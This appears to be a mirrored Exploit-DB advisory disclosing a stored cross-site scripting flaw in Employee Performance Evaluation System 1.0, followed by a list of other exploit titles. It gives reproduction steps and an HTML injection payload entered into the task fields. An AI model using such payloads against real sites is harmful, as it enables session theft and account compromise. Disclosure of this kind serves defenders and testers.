Employee Performance Evaluation System 1.0 – ‘Task and Description’ Persistent Cross Site Scripting

Exploit Database
14 阅读

作者： Ritesh Gohil

日期： 2020-12-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/49215/

# Exploit Title: Employee Performance Evaluation System 1.0 - ' Task and Description' Persistent Cross Site Scripting
# Date: 08/12/2020
# Exploit Author: Ritesh Gohil
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html
# Version: 1.0
# Tested on: Windows 10/Kali Linux

Steps to Reproduce:
1) Login with Admin Credentials and click on 'Task' button.
2) Click on Add New Task Button.
3) Now add the following payload input field of Task and Description

Payload:ritesh"><img src=x onerror=alert(document.domain)>

4) Click On Save
5) XSS payload is triggered.

last Exploits
Employee Performance Evaluation System 1.0 – ‘Task and Description’ Persistent Cross Site Scripting的更多信息

Joomla! Component Photo Contest 1.0.2 – SQL Injection：
Joomla! Component CCBoard 1.2-RC – Multiple Vulnerabilities：
Joomla! 1.5.22 / 1.6.0 – ‘com_mailto’ Spam Mail Relay：
Joomla! Component AYS Quiz 1.0 – ‘id’ SQL Injection：
phpSQLiteCMS – Multiple Vulnerabilities：
Punbb 1.3.4 – Multiple Full Path Disclosures：
Opsview pre 4.4.1 – Blind SQL Injection：
Jenkins 1.633 – Credential Recovery：